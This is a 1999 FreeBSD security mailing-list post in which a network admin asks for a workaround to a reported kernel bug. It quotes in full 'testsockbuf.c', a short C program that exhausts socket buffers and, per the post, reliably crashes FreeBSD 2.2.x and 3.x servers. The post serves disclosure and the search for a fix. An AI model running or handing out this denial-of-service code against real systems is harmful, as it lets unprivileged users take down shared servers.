From owner-freebsd-security  Mon Aug 16 17:27:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1])
	by hub.freebsd.org (Postfix) with ESMTP id C4E2A14BF8
	for <freebsd-security@freebsd.org>; Mon, 16 Aug 1999 17:27:17 -0700 (PDT)
	(envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA13737 for <freebsd-security@freebsd.org>; Mon, 16 Aug 1999 20:27:29 -0400 (EDT)
Message-Id: <4.1.19990816203409.05989960@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 
Date: Mon, 16 Aug 1999 20:40:29 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa <mike@sentex.net>
Subject: Any work around for this FreeBSD bug/DoS  ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


Is there any work around or coming fix for the 'testsockbuf.c' originally
reported by Marc Olzheim <marcolz@ilse.nl> on Aug 9th ?  Its only a matter
of time until some wannabe script kiddie uploads it to one of my servers
for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I
sent a message to the security officer last week but havent heard anything
since then.

	---Mike

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }

        return(0);
}

	---Mike

**********************************************************************
Mike Tancsa, Network Admin        *  mike@sentex.net
Sentex Communications Corp,       *  http://www.sentex.net/mike
Cambridge, Ontario                *  01.519.651.3400
Canada                            *


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message